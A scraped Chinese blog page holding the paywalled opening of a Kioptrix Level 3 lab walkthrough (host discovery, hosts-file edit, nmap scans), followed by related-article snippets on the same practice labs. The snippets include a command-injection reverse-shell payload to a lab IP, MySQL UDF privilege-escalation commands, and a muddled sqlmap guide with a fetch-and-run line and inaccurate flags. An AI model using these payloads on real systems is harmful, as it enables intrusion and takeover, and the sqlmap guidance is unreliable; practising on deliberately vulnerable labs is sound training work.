Vulnhub-Kioptrix Level 3 打靶方法一

原创

已于 2024-12-08 21:08:53 修改 · 1.4k 阅读

30 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #web安全 #笔记

于 2024-12-08 21:08:09 首次发布

arp-scan -l 主机发现，确定192.168.213.134为靶机

一、修改hosts文件

在打靶机之前，发现有一个readme.txt,提示要修改 hosts文件

所以首先 vim /etc/hosts 添加靶机IP kioptrix3.com

二、nmap扫描

nmap -sT --min-rate 10000 -p- 192.168.213.134 -oA nmapscan/port

nmap -sT -sC -sV -v -O -Pn -p22.80 192.168.213.134 -oA nmapscan/detail

nmap -sU -p- --min-rate 10000 192.168.213.134 -oA nmapscan/udp

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

a2FpX2tr

关注关注

30
点赞
踩
30

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTF之Kioptrix Level 1.1 靶机渗透（万能密码命令注入）

afei001

04-16

1251

练习环境攻击机：kali 靶机：Kioptrix: Level 1.1 下载地址：https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 1.发现靶机，端口扫描 root@kali:~# netdiscover -r 192.168.43.0/16 ________________________...

Vulnhub-Kioptrix Level 4 打靶

a2FpX2tr的博客

12-10

886

UDF提权不止有创建新用户并赋予root权限，下面还有几种方法供大家选择： 1. 设置 SUID 位通过设置 SUID 位，允许普通用户以 root 权限运行某些程序，例如 /bin/bash： SELECT sys_exec('chmod u+s /bin/bash'); 2.将用户 john 添加到 sudo 组 SELECT sys_exec('/usr/sbin/usermod -aG sudo john'); 3.修改系统登录文件（如 /etc/passwd）将 root 用户的密码直接移除

参与评论您还未登录，请先登录后发表或查看评论

VulnHub靶机入门篇--kioptrix.level 3

2302_78903258的博客

07-29

1288

发现有一个login的登录框，可能存在sql注入漏洞，或者弱口令，并且发现这里有一个LotusCMS,网上查找一个信息，看看有没有相关的漏洞。这边可以看到URI为/lcms/但是我本地是没有这个路径的，所以我们这里需要设置下RHOSTS和URI。使用如下命令选择此 Auxiliary，或者使用命令。这里一直没有什么反应，可能是脚本的原因，用。哎，还是失败，查看原因，说使用Nat模式。使用msfconsole命令进入msf6。好像并没有什么用，只能看看80端口的服务。使用第14个的命令或者使用命令。

Vulnhub靶机：Kioptrix_Level1.1

qq_48904485的博客

03-13

638

运行环境：Virtualbox攻击机：kali（192.168.56.101）靶机：Kioptrix_Level1.1（192.168.56.104）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

#渗透测试 kioptix level 2靶机通关教程及提权

fenfenfen520a的博客

12-24

声明！文章所提到的网站以及内容，只做学习交流，其他均与本人以及泷羽sec团队无关，切勿触碰法律底线，否则后果自负！！！！工具链接：https://pan.quark.cn/s/530656ba5503 一、准备阶段复现请将靶机ip换成自己的 kali: 192.168.108.130 靶机：1

Vulnhub靶机系列：Kioptrix: Level 1.2 (#3)

01-09

这次的靶机是Vulnhub靶机：Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 靶机设置老规矩，开启虚拟机前分配一个和攻击机一样的网卡，选择我已移动该虚拟机；开启虚拟机后，netdiscover确认一下目标，我的靶机ip为192.168.190.189 靶机描述里还要配置host指向kioptrix3.com vim /etc/hosts 利用知识及工具信息收集并getsh

Vulnhub-Kioptrix Level 3 打靶方法二

a2FpX2tr的博客

12-09

466

Vulnhub-Kioptrix Level 3 打靶方法一-优快云博客。

Vulnhub-Kioptrix Level 2 打靶

a2FpX2tr的博客

12-07

1918

现在功能正常了 nc监听并构造payload反弹shell：127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'nmap -sn 192.168.213.0/24 #在靶机打开时和未打开时使用这条命令，判断那个IP为靶机。apache 2.0.52有 dos漏洞，也探测出有csrf漏洞，没法getshell，放弃。是一个登录界面，先f12看一下，会不会泄露出是什么cms或发现其他的敏感信息。

vulnhub-Kioptrix2014靶场

shulao2010的博客

05-26

622

通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击

VulnHub——Kioptrix Level 3

江左盟的博客

05-28

3232

目录简介信息收集漏洞检测与利用权限提升总结简介该靶机还是一如既往的简单，通过信息收集发现Web服务使用LotusCMS，使用Google搜索发现存在已知漏洞，通过漏洞利用脚本获得webshell，然后通过内核漏洞直接提升权限到root。信息收集探测目标主机IP地址，如图：然后对目标主机进行快速端口扫描，发现开启22和80端口，OpenSSH版本4.7p1，Apache版本2.2.8，PHP版本5.2.4-2，操作系统可能为Debian或Ubuntu，内核版本为2.

Vulnhub系列-Kioptrix-Level-3

Yasso的博客

12-19

1500

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好！这是你第一次使用 Markdown编辑器所展示的欢迎页。如果你想学习如何使用Mar

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8856

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

小迪安全_第4天：基础入门-30余种加密编码进制&Web&数据库&系统&代码&参数值|小迪安全笔记|网络安全|

weixin_45635831的博客

12-30

519

综合性加密平台：支持大部分常见加密算法，但部分特殊加密需要借助其他平台主要功能：提供MD5、SHA1等加密算法的反向查询服务数据库规模：记录约90万亿条，占用硬盘超过500TB查询成功率：全球领先，达95%以上，部分复杂密文仅该平台可查运营时间：自2006年运行至今，国内外享有盛誉识别能力：掌握各种加密方式的识别方法和特征应用场景：了解不同加密算法在实际中的应用场景解决思路：明确解密所需条件和可能遇到的限制。

【要闻周报】网络安全与数据合规 12-31

最新发布

专注于制造仓库、生产线边仓、物流仓储等人工拆零拣选辅助系统以及前沿技术。

12-31

690

国家网信办发布《网络数据安全风险评估办法（征求意见稿）》、国家计算机病毒应急处理中心检测发现69款违法违规收集使用个人信息的App、《贵州省大数据发展应用促进条例》自2026年1月1日起施行、湖南省网信办发布2025年度湖南省汽车数据报送工作的通知、上海发布5起不履行个人信息保护义务的典型案例、欧盟：欧盟委员会依据DSA对X处以1.2亿欧元罚款、爱尔兰：CnaM对LinkedIn和TikTok展开DSA潜在违法调查。

新规解读：2025 年修正版《中华人民共和国网络安全法》核心变化解读

meidaoliha的博客

12-30

548

强化新兴技术安全监管：将人工智能纳入法律框架，明确技术研发与伦理规范并行的发展路径。强化关键主体责任：针对关键信息基础设施运营者、网络产品服务提供者设置更严格的义务与处罚标准。强化法律体系衔接：与《数据安全法》《个人信息保护法》《人工智能法（草案）》形成协同，构建全方位的网络安全法治体系。对行业而言，修正版的实施将推动网络运营者加大安全投入，加速人工智能安全技术的研发与应用，同时倒逼企业完善数据治理与合规管理体系，为我国数字经济高质量发展筑牢安全屏障。新修正法规见上篇文章。

计算机网络（郑烇） 8 网络安全

qq_44845100的博客

12-28

152

网络安全等级保护：合规基石与风险管理核心

jiedaodezhuti的博客

12-31

349

网络安全等级保护，简称“等保”，其核心要义在于根据信息系统对国家安全、社会秩序、公共利益以及公民、法人和其他组织合法权益的重要性，及其一旦遭到破坏、丧失功能或数据泄露可能造成的危害程度，实施分级、分类的安全保护与监督管理。3. 建设整改：依据对应等级的安全要求，对信息系统的技术防护措施（如网络边界防护、访问控制、加密传输）和安全管理体系（如制度、人员、运维流程）进行建设和整改，以满足标准。5. 监督检查：公安机关及行业主管部门依法对定级备案、等级测评、安全整改等落实情况进行定期或不定期的监督、检查、指导。

weixin_45635831的博客

12-30

959

"32位MD5/NTLM，40位SHA1，64位SHA256；Base64带=，URL带%，Hex无符号，JSFuck全符号！"MD5存密码？漏洞在手！Base64当加密？直接解码走！NTLM看ccef，SHA256更安全！

7. 网络安全-等保

princemilo的博客

12-29

817

国家要求信息系统（网站、APP、云平台等）进行分等级的保护。

VulnHub Kioptrix Level 4 通过sqlmap --os shell提权的详细打靶过程及相应代码

10-26

VulnHub的Kioptrix Level 4是一个常见的渗透测试平台，它模拟了一个Linux服务器环境，挑战玩家通过一系列的安全漏洞进行系统级别的权限提升。在这个级别中，其中一个目标是利用SQL注入漏洞并使用`sqlmap`工具获取数据库shell权限。 **步骤1：识别SQL注入点** 首先，你需要登录到kioptrix服务器，并尝试交互式命令行，可能会发现涉及数据库查询的操作存在输入验证不足，这通常是SQL注入的线索。 **示例命令** (假设使用nc工具连接): ``` nc <Kioptrix IP> <Port> ``` **步骤2：使用sqlmap** 安装sqlmap，你可以使用pip安装： ```bash pip install sqlmap ``` 然后尝试运行sqlmap，传入url和你认为可能的注入点： ```bash sqlmap -u '<URL>' --data='<payload>' --dbs # payload可能是'username=your_username&password=' ``` 这里payload通常包含一些特殊字符，如单引号('), 双引号(")，或者空格。 **步骤3：获取数据库信息** 一旦成功注入，sqlmap会尝试列出可用的数据库、表以及获取敏感数据，如用户和密码： ```bash # 获取所有数据库 sqlmap --dbs # 进一步查看特定数据库的表 sqlmap --db=<database_name> --tables # 获取表中的数据 sqlmap --db=<database_name> --table=<table_name> --columns ``` **步骤4：利用shell命令** 如果找到合适的列（比如存放shell路径或可执行文件的列），可以尝试执行SQL命令获取shell，例如： ```bash sqlmap --db=<database_name> --table=<table_name> --column=executable_file --where="id=<target_id>" --dump ``` 这将下载到一个可执行文件，然后尝试使用它作为shell: ```bash wget <file_path> && chmod +x <file_path> && ./<file_path> ``` **注意**: - 操作需谨慎，确保不会触发防火墙或者进一步锁定账户。 - 实际操作过程中可能需要根据服务器的日志和提示调整payload和命令。